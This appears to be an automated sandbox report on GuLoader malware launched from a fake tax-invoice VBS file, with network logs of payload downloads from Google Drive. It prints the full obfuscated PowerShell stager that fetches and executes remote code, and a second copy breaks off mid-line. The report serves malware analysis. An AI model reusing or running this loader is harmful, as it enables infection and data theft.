Sep 30, 2024 09:57:21.865652084 CEST | 192.168.2.5 | 1.1.1.1 | 0xf57a | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Sep 30, 2024 09:58:00.660109043 CEST | 192.168.2.5 | 1.1.1.1 | 0x8125 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 30, 2024 09:57:20.808336020 CEST | 1.1.1.1 | 192.168.2.5 | 0xb85b | No error (0) | drive.google.com | | 172.217.18.14 | A (IP address) | IN (0x0001) | false
Sep 30, 2024 09:57:21.873478889 CEST | 1.1.1.1 | 192.168.2.5 | 0xf57a | No error (0) | drive.usercontent.google.com | | 142.250.186.33 | A (IP address) | IN (0x0001) | false
Sep 30, 2024 09:58:00.666986942 CEST | 1.1.1.1 | 192.168.2.5 | 0x8125 | No error (0) | drive.google.com | | 172.217.16.206 | A (IP address) | IN (0x0001) | false

                                              • drive.google.com
                                              • drive.usercontent.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49726 | 172.217.18.14 | 443 | 1788 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-30 07:57:21 UTC | 215 | OUT | GET /uc?export=download&id=1aJr3ENUZIKKZBmNbd6io0bC5vsII6aL1 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                              Host: drive.google.com
                                              Connection: Keep-Alive
2024-09-30 07:57:21 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                              Content-Type: application/binary
                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                              Pragma: no-cache
                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                              Date: Mon, 30 Sep 2024 07:57:21 GMT
                                              Location: https://drive.usercontent.google.com/download?id=1aJr3ENUZIKKZBmNbd6io0bC5vsII6aL1&export=download
                                              Strict-Transport-Security: max-age=31536000
                                              Cross-Origin-Opener-Policy: same-origin
                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                              Content-Security-Policy: script-src 'nonce-naUBYsCK0OwWPzfSZSMWbQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                              Server: ESF
                                              Content-Length: 0
                                              X-XSS-Protection: 0
                                              X-Frame-Options: SAMEORIGIN
                                              X-Content-Type-Options: nosniff
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49727 | 142.250.186.33 | 443 | 1788 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-30 07:57:22 UTC | 233 | OUT | GET /download?id=1aJr3ENUZIKKZBmNbd6io0bC5vsII6aL1&export=download HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                              Host: drive.usercontent.google.com
                                              Connection: Keep-Alive
2024-09-30 07:57:25 UTC | 4860 | IN | HTTP/1.1 200 OK
                                              Content-Type: application/octet-stream
                                              Content-Security-Policy: sandbox
                                              Content-Security-Policy: default-src 'none'
                                              Content-Security-Policy: frame-ancestors 'none'
                                              X-Content-Security-Policy: sandbox
                                              Cross-Origin-Opener-Policy: same-origin
                                              Cross-Origin-Embedder-Policy: require-corp
                                              Cross-Origin-Resource-Policy: same-site
                                              X-Content-Type-Options: nosniff
                                              Content-Disposition: attachment; filename="Pelsberederierne.hhk"
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Credentials: false
                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                              Accept-Ranges: bytes
                                              Content-Length: 478500
                                              Last-Modified: Mon, 30 Sep 2024 04:44:02 GMT
                                              X-GUploader-UploadID: AD-8ljvGTw1WXNRy7BeKZZdJblRxH9wHveuALGxht_cyPGsIpw5RsWOdJZ9n4TnWg2KdM24B-jGJVmuosg
                                              Date: Mon, 30 Sep 2024 07:57:25 GMT
                                              Expires: Mon, 30 Sep 2024 07:57:25 GMT
                                              Cache-Control: private, max-age=0
                                              X-Goog-Hash: crc32c=J7gn+A==
                                              Server: UploadServer
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Connection: close
                                              Data Ascii: myBAmqIqZYX/pWgoJ4oYEc/hNWV//lMkYJJXAT7XOP9rhLkQqDjmiiNRdZhS/dSheEMcTU1qecvhLRkEdvDMRweSeh5WA3HLv3uSpeRjaNZae+5dW5ZNuRqQvNtuwqLohV+swtMLhJ1eZ70bqsCe8ebj8USO3a44i4p+YMjSSHutHolnIbVEpDYJF/Up9wwYDdPbCgsUSxSXSRXP+JUU+ipUqrIpE+6FXbCk6XM8gTomxR9zTLlNZ49W3J1fOQY


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              2 | 192.168.2.5 | 49733 | 172.217.16.206 | 443 | 1632 | C:\Windows\SysWOW64\msiexec.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-09-30 07:58:01 UTC | 216 | OUT | GET /uc?export=download&id=1TCrKEm5gkVToVcX1hHdm-2VGdJUjc69Y HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                              Host: drive.google.com
                                              Cache-Control: no-cache
                                              2024-09-30 07:58:01 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                              Content-Type: application/binary
                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                              Pragma: no-cache
                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                              Date: Mon, 30 Sep 2024 07:58:01 GMT
                                              Location: https://drive.usercontent.google.com/download?id=1TCrKEm5gkVToVcX1hHdm-2VGdJUjc69Y&export=download
                                              Strict-Transport-Security: max-age=31536000
                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                              Cross-Origin-Opener-Policy: same-origin
                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                              Content-Security-Policy: script-src 'nonce-v4yLWfiSUc7uweyA3D8qaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                              Server: ESF
                                              Content-Length: 0
                                              X-XSS-Protection: 0
                                              X-Frame-Options: SAMEORIGIN
                                              X-Content-Type-Options: nosniff
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Connection: close


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              3 | 192.168.2.5 | 49734 | 142.250.186.33 | 443 | 1632 | C:\Windows\SysWOW64\msiexec.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-09-30 07:58:02 UTC | 258 | OUT | GET /download?id=1TCrKEm5gkVToVcX1hHdm-2VGdJUjc69Y&export=download HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                              Cache-Control: no-cache
                                              Host: drive.usercontent.google.com
                                              Connection: Keep-Alive
                                              2024-09-30 07:58:05 UTC | 4861 | IN | HTTP/1.1 200 OK
                                              Content-Type: application/octet-stream
                                              Content-Security-Policy: sandbox
                                              Content-Security-Policy: default-src 'none'
                                              Content-Security-Policy: frame-ancestors 'none'
                                              X-Content-Security-Policy: sandbox
                                              Cross-Origin-Opener-Policy: same-origin
                                              Cross-Origin-Embedder-Policy: require-corp
                                              Cross-Origin-Resource-Policy: same-site
                                              X-Content-Type-Options: nosniff
                                              Content-Disposition: attachment; filename="taILrrpnLxtUyEfE8.bin"
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Credentials: false
                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                              Accept-Ranges: bytes
                                              Content-Length: 494656
                                              Last-Modified: Mon, 30 Sep 2024 04:42:22 GMT
                                              X-GUploader-UploadID: AD-8ljvsXpTe88CUsLK3uf4a0Gpy9oyapjYK0KqQd5159qd7DXoYMBts5_FziQzDJFiGr9b0gqNird44Lg
                                              Date: Mon, 30 Sep 2024 07:58:05 GMT
                                              Expires: Mon, 30 Sep 2024 07:58:05 GMT
                                              Cache-Control: private, max-age=0
                                              X-Goog-Hash: crc32c=P9b0ow==
                                              Server: UploadServer
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Connection: close


                                              Target ID:0
                                              Start time:03:57:15
                                              Start date:30/09/2024
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NTS_eTaxInvoice.html.vbs"
                                              Imagebase:0x7ff6f2b40000
                                              File size:170'496 bytes
                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:2
                                              Start time:03:57:18
                                              Start date:30/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Permit Billeted Livserfarent Magmatism #>;$Homologue='ensorrow';<#prossie Udryddelseslejrenes Interjectionalized jobannoncer Anstillelser Sdmefuldes Bakkeen #>;$Sledgehammered=$host.PrivateData;If ($Sledgehammered) {$Genanvendelser++;}function Demissioner($Unlaconic){$Conversations=$Unengaging+$Unlaconic.Length-$Genanvendelser;for( $Kanaljen=5;$Kanaljen -lt $Conversations;$Kanaljen+=6){$Cochleous+=$Unlaconic[$Kanaljen];}$Cochleous;}function Complimentable($centronucleus){ . ($Garanti) ($centronucleus);}$Convectively=Demissioner 'AdherMPinoco.ivinzDesiligene lRed,vlR.rria Limo/Mic.o5Efter.E oti0.itdo Phram(OdiniWPrvebiSyndin BrebdHid eo AdvewFlgeps Po s PaceN ialTSkygg Kursu1Mis a0Indle. Gstg0Super;Pr,va Asep WIndk,iHalvpn enat6Still4Anabl; Peri BlaanxOppeb6Smukt4Count;Filtr CuretrBasi vBedoe:Drypf1Flo e2Mando1Soran.Tipol0baggr)Spotm angstGPho.oekongec.eigekN,wfooR all/Tria 2Svmme0Sgeko1Telem0D ool0 Babe1rdk k0Marki1Recir B.jekFKaleniTrl grhypopeRehabfSkimtoOpht.x ffec/Ch om1Rund,2 Scut1 Ytre.Ripen0Undlb ';$Saccharofarinaceous=Demissioner ' PostUTek oSKanteESk ivRVan e-RiffiAMultigWeeklEmel oNIdiorT Pr.t ';$Dermoid108=Demissioner 'TzolkhWynketIndflt Ga.gpP.rsosForga:Secti/abern/FemdodHospir StariMoilsvKakkee Chup.DelafgDeflooRedero,endrg MonolFugtieArkiv.MedvicA,eneoKo,mumObskn/ ailluHarroc Ince?Mo emeErgasx LivspInobto Pu rr valetDruek= forsdFortroMatriwCon entillylGnat,oAngreaSo madgldsf&.uskeiParamdBacil= Nive1Pilloa fficJAnticrKapil3FremmEPrimrNKor,oUH,perZPa.acI BoucKFeatuKSkytsZnanziBTeks mHaircNSvineb AflgdFoame6Menedi MutaoSols.0 gtpbarr sC acco5DekupvSendesAlderIImmunIJazzo6KommuaOve.vL.aike1Antit ';$Henrykkelser=Demissioner ' Und.>Ga.um ';$Garanti=Demissioner 'uns.dIBespiEUne hXNdend ';$Funktionens98='Zizit';$Klemskrue67='\Forsvarsundtagelsen.Non';Complimentable (Demissioner 'S,udv$pottegNonmulSkifeo 
kloebPolitaTer,ilph.ll:ForbrTSubpraEuphok VatttAlterrKommueUdr ag acuuBrn plPaahneDefinrStigmiHalssnD.langUn omsF rgro rrisrWar,odSolbanNeglei HjdenAgramgTilkr=Antik$Mutile Udfln FendvNonfa:blatta Frikp Klasp tetidGnat.aSkoletmonu aIndja+ Srej$SekssKColeglBetake C vimBe.risPiruekInd ur BekmuBambue erni6Hemap7 Asp, ');Complimentable (Demissioner ' Prmi$Q ibbgStenklFiletoI desbChambaUnderl Spec: ardRnonmoeLycopk rhebr ProleSkov eHazelr SatreIndbodSnoreenyh dsTungs= Eco,$ HjemD UdlaeStro rCologmIndsaoSampli Mimod ko,m1 loat0Affat8Refor.Bedris E prpJ.gtrlDehemi etabtSabia(Arbej$Uko lHHo edeAl,arnStok.r ,andy olvkUngp kunleae WiktlSub osBemalePrak rSlopl) Mold ');Complimentable (Demissioner 'Nedri[L.uwiNStatieAntictAqu n.FaintSAris,eSuccor BunkvSegm iSubimcMisdeeSkrivPSiffro arveiUnplunP,rtntForvrM aligaBed mndemisa,laasg,arneePregnrGeote]Meggy: Fors: NeutSD sjueProvocGanesuEncryrGuaiai ProltJou nyExcepPTankbrUdenooHu kat HymnoSummecTil aoForbrlPhen Garn=Under Dic,[ Es.iN Di peLn svtFrems. MispSca lieTitilc UdsuuTyk erNonneiColletalteryUd,ytPDegrarAnlgsoTilintdefiboP ogrcK.essoDet,clG lfdTWei hyIndh pObjeke.ebuk]Ordd,:Hjest:SubaqTBaglylGelatsRubin1 B,oa2Nerei ');$Dermoid108=$Rekreeredes[0];$Aalb=(Demissioner 'Hellm$ nbegg odralDentioLnsitbDrumrABlindl Picc:CommoMUdsena inden,etrauBoardSV,riae pndeRPteleSZo ch=Syntan BeeseAnatfW Knap-Tang oFremsbE samJLukkeERipplc Utalt Sema RadioS omsYFin,eS CajutGar iET,talm Klum.OsmetNF rskemol atRamni.AeridWClienEGiantB akeeCFnaddl afiriS aineCountNIndgrT urve ');Complimentable ($Aalb);Complimentable (Demissioner 'Unm n$ AandMAprjtaDiscon.igmouRos vsSurgeepolycrKl nisSpi l.NatioH PeaseKolibaProjed imike.lestr ochls Gulp[ semi$ami,aSBesluaMendicY erpcDe,eah.ammea HuserHaymiosuperfInferaParaprSuperi OplinC,priaCigarcSnavseBehagoBa liuCl,nksSalut]S veb=San t$ harCP eroo Fingn Oplav JudaeTaxabcAf ket Laici IntivTonetelactol taily acci ');$Bortkaldenes=Demissioner ' Run $KugleM evea SchonSubtruA tens 
edbeNoctirV.nstsEremi.UdsorDegenpowheatwToldanDescrlPilotoIsltpaSe.undTeor FSh rpiHajerl.ndlie rais(Sk ll$progrDHypoaeA wesr Ichtm RedioSlgegiBuddhdStor 1Pro u0 Komi8 For ,Supin$KloroTTripii spanl an asSamm.tA likaDisbunFortidSympts AntikL.mfaoCheunn.halat Sew.r Fas,o F,rsl SennlForlaeTabernForsk)Early ';$Tilstandskontrollen=$Taktreguleringsordning;Complimentable (Demissioner ' St.a$SagsbgHeterLLin,aOOverlB Ac,tA MonuLFork :RaaensIps,lEaburacCha,uE.amboS Svi,hYtt oeAu okrHyoep= Khar(SlabutReconedialesS rjtTAccen- SlenPMins A,njurtBuskvHDemor syla$H.nritStil.i DiviL Sel SImpasT orbeAFamleNLa,tidOsteesSlittK CyphO Dec nTilflTColorrFlde oPushelDangllAposteKont Nmetag)Mith ');while (!$Secesher) {Complimentable (Demissioner 'Besho$W ankgToolmlIndenoDingibStjmaa PosslKrmme: BldgLMappegUr.tie skvamS xoliSteepdGadenlUncateLal erDiagrsArbej=S.nka$ReduptReletrPreteuKe.neeRredd ') ;Complimentable $Bortkaldenes;Complimentable (Demissioner 'PositS ConstBaandaA ronrPlummtmax l-RadicSRebuclH,tideNondaeF.odepF rbi Parag4Perki ');Complimentable (Demissioner 'Vates$CentegtokonlT gneoMartibIndkbaRededlC lla:RegniSSt,ike UdskcSmidieForhasHarboh undeeExpatrRetou= Remu(,luviTKonsteRedidsHypert E.ns-FodtuPSpinaaAfgiftAutomhUnwil Skel $ouchiTFedtei Ko.llSoillsLselatGe iraHolden UdbldForsesP lotkFo nuo ba ln Eks t HjerrLarkio RentlKvajplIn uleSpec nF rtl)Age s ') ;Complimentable (Demissioner 'Unvex$UnweagDis elemissoSemipbb odtaSvinglPostd:ThousNMick yDgl nsPlombeMacra= Re r$ Sno.gGrumblUnevao LeucbPartiaRe.mplP ras:C lfoS HalvtlivssmSelvraKo,ypgAarsktLittleChambrDansknPart,e Fr.p+Frems+Balde% luor$OspheRPiggieind rkArecarS bbre For.e.ersurFolloeAmberd usmoeNonres Tndi.ShoemcRew,ro MultuQua,en m,krtFi,eo ') ;$Dermoid108=$Rekreeredes[$Nyse];}$hanerne=327149;$Whitewashes=31726;Complimentable (Demissioner 'Godke$ Mudrg ChanlSklveoAgorabI posaKontalKathi: ArmvTNicksyHel.as BrilkSu syl Cas aRedamn Po gdtorqusexophk BranoHurtirDiapatTovreemalacnKo keeVandf Rente=K,ydr UnmaGOgcoce KonttTelea-v 
yagC Preeo PennnMur etTrumbeAntipnBour tBog.r .well$S iseTHjtidiKo salBrdtesParcet SkaraMeta nAl ebd innosImprekGymnaounfe.nStanstSomatra,itho GenmlSereal D,caePbelanpentr ');Complimentable (Demissioner 'Helio$fontegRuskvlEul goTr,ldbShmooaAboitlA ive:SkmteAL vitfDataovBridaiunshrsTi,skeLedersUrocy F rgl=Strit Kna,e[D mkiSBjensyElaeosDecrot K,ype B.gsm Defi.An.itCPlejeoRi.honIntervSminkeMet,lrFejlktFrken]Barbo:Symph:BobslFsygepr InduoSkummmUnel BChr saAltersA.reme.asel6Vej n4PresuS anectGli.trNutidicho en Halvg We d(.nder$Nonc T LgdeyT.igosPeltikZoonulTheataResu,nAlarmd DeodsStrudkUforkobasisrDisset UforeM,tronLu,eaeIncon)Blunt ');Complimentable (Demissioner ',iern$UdbldgAf nnl zygoo BespbLave,ashal.lstrue:Pe sohKlbenyRevispTranse Profr LumidMispoeOrdk.l PrstiMallec Grapas.gnecTankeyHausf Bo sa=Garr, Plan[VarmeSandenyAnthrsCherrtS ovbe ChesmBulkl.P.ojeTBalloeT iloxGavltt Rh.x.Wi dbEFermenfljtecAabenom.rryd mneiPodopnDodecg,kole]Sidew:Carbi:UnwebA s apSNieceCDilatIUngtjIStorm.UdfreGDogmaeSyntatSuli.SGla.ftMondorEmbaciSegganApertgRommy(Fruit$ DemoA Car,fSpectvKommuiMicrosForeseAr.easNedto)Be.ud ');Complimentable (Demissioner 'U.ere$ Afskg AvlslUnmanoK rtebElandaClanslPha,t:Poly,EBullisStigmt brikhEx rieBalanshaeani Vej,oVilk,gAnnlirA.equa D gep AfbahAptycyAgerb=Arbit$ KanehLeucoy Loo pEuroceRawbor BuksdCryste vehilMargiiBrnebcunentaMomencDafniyMac.o. eners Fuldu ankebStar sIchortTek tr Solsi ,rcin eohygForby(Elect$CensohTor kaShadfnScapheSlatirBriefnZ,dkueMisap,Mine,$StortWK lethSt rei HachtinteleBlindw InteaStyrbs F,erhBilggeAarsis Stud)Eng n ');Complimentable $Esthesiography;"
                                              Imagebase:0x7ff7be880000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2370425818.000001D31006D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:true

                                              Target ID:3
                                              Start time:03:57:18
                                              Start date:30/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:4
                                              Start time:03:57:29
                                              Start date:30/09/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Permit Billeted Livserfarent Magmatism #>;$Homologue='ensorrow';<#prossie Udryddelseslejrenes Interjectionalized jobannoncer Anstillelser Sdmefuldes Bakkeen #>;$Sledgehammered=$host.PrivateData;If ($Sledgehammered) {$Genanvendelser++;}function Demissioner($Unlaconic){$Conversations=$Unengaging+$Unlaconic.Length-$Genanvendelser;for( $Kanaljen=5;$Kanaljen -lt $Conversations;$Kanaljen+=6){$Cochleous+=$Unlaconic[$Kanaljen];}$Cochleous;}function Complimentable($centronucleus){ . ($Garanti) ($centronucleus);}$Convectively=Demissioner 'AdherMPinoco.ivinzDesiligene lRed,vlR.rria Limo/Mic.o5Efter.E oti0.itdo Phram(OdiniWPrvebiSyndin BrebdHid eo AdvewFlgeps Po s PaceN ialTSkygg Kursu1Mis a0Indle. Gstg0Super;Pr,va Asep WIndk,iHalvpn enat6Still4Anabl; Peri BlaanxOppeb6Smukt4Count;Filtr CuretrBasi vBedoe:Drypf1Flo e2Mando1Soran.Tipol0baggr)Spotm angstGPho.oekongec.eigekN,wfooR all/Tria 2Svmme0Sgeko1Telem0D ool0 Babe1rdk k0Marki1Recir B.jekFKaleniTrl grhypopeRehabfSkimtoOpht.x ffec/Ch om1Rund,2 Scut1 Ytre.Ripen0Undlb ';$Saccharofarinaceous=Demissioner ' PostUTek oSKanteESk ivRVan e-RiffiAMultigWeeklEmel oNIdiorT Pr.t ';$Dermoid108=Demissioner 'TzolkhWynketIndflt Ga.gpP.rsosForga:Secti/abern/FemdodHospir StariMoilsvKakkee Chup.DelafgDeflooRedero,endrg MonolFugtieArkiv.MedvicA,eneoKo,mumObskn/ ailluHarroc Ince?Mo emeErgasx LivspInobto Pu rr valetDruek= forsdFortroMatriwCon entillylGnat,oAngreaSo madgldsf&.uskeiParamdBacil= Nive1Pilloa fficJAnticrKapil3FremmEPrimrNKor,oUH,perZPa.acI BoucKFeatuKSkytsZnanziBTeks mHaircNSvineb AflgdFoame6Menedi MutaoSols.0 gtpbarr sC acco5DekupvSendesAlderIImmunIJazzo6KommuaOve.vL.aike1Antit ';$Henrykkelser=Demissioner ' Und.>Ga.um ';$Garanti=Demissioner 'uns.dIBespiEUne hXNdend ';$Funktionens98='Zizit';$Klemskrue67='\Forsvarsundtagelsen.Non';Complimentable (Demissioner 'S,udv$pottegNonmulSkifeo 
kloebPolitaTer,ilph.ll:ForbrTSubpraEuphok VatttAlterrKommueUdr ag acuuBrn plPaahneDefinrStigmiHalssnD.langUn omsF rgro rrisrWar,odSolbanNeglei HjdenAgramgTilkr=Antik$Mutile Udfln FendvNonfa:blatta Frikp Klasp tetidGnat.aSkoletmonu aIndja+ Srej$SekssKColeglBetake C vimBe.risPiruekInd ur BekmuBambue erni6Hemap7 Asp, ');Complimentable (Demissioner ' Prmi$Q ibbgStenklFiletoI desbChambaUnderl Spec: ardRnonmoeLycopk rhebr ProleSkov eHazelr SatreIndbodSnoreenyh dsTungs= Eco,$ HjemD UdlaeStro rCologmIndsaoSampli Mimod ko,m1 loat0Affat8Refor.Bedris E prpJ.gtrlDehemi etabtSabia(Arbej$Uko lHHo edeAl,arnStok.r ,andy olvkUngp kunleae WiktlSub osBemalePrak rSlopl) Mold ');Complimentable (Demissioner 'Nedri[L.uwiNStatieAntictAqu n.FaintSAris,eSuccor BunkvSegm iSubimcMisdeeSkrivPSiffro arveiUnplunP,rtntForvrM aligaBed mndemisa,laasg,arneePregnrGeote]Meggy: Fors: NeutSD sjueProvocGanesuEncryrGuaiai ProltJou nyExcepPTankbrUdenooHu kat HymnoSummecTil aoForbrlPhen Garn=Under Dic,[ Es.iN Di peLn svtFrems. MispSca lieTitilc UdsuuTyk erNonneiColletalteryUd,ytPDegrarAnlgsoTilintdefiboP ogrcK.essoDet,clG lfdTWei hyIndh pObjeke.ebuk]Ordd,:Hjest:SubaqTBaglylGelatsRubin1 B,oa2Nerei ');$Dermoid108=$Rekreeredes[0];$Aalb=(Demissioner 'Hellm$ nbegg odralDentioLnsitbDrumrABlindl Picc:CommoMUdsena inden,etrauBoardSV,riae pndeRPteleSZo ch=Syntan BeeseAnatfW Knap-Tang oFremsbE samJLukkeERipplc Utalt Sema RadioS omsYFin,eS CajutGar iET,talm Klum.OsmetNF rskemol atRamni.AeridWClienEGiantB akeeCFnaddl afiriS aineCountNIndgrT urve ');Complimentable ($Aalb);Complimentable (Demissioner 'Unm n$ AandMAprjtaDiscon.igmouRos vsSurgeepolycrKl nisSpi l.NatioH PeaseKolibaProjed imike.lestr ochls Gulp[ semi$ami,aSBesluaMendicY erpcDe,eah.ammea HuserHaymiosuperfInferaParaprSuperi OplinC,priaCigarcSnavseBehagoBa liuCl,nksSalut]S veb=San t$ harCP eroo Fingn Oplav JudaeTaxabcAf ket Laici IntivTonetelactol taily acci ');$Bortkaldenes=Demissioner ' Run $KugleM evea SchonSubtruA tens 
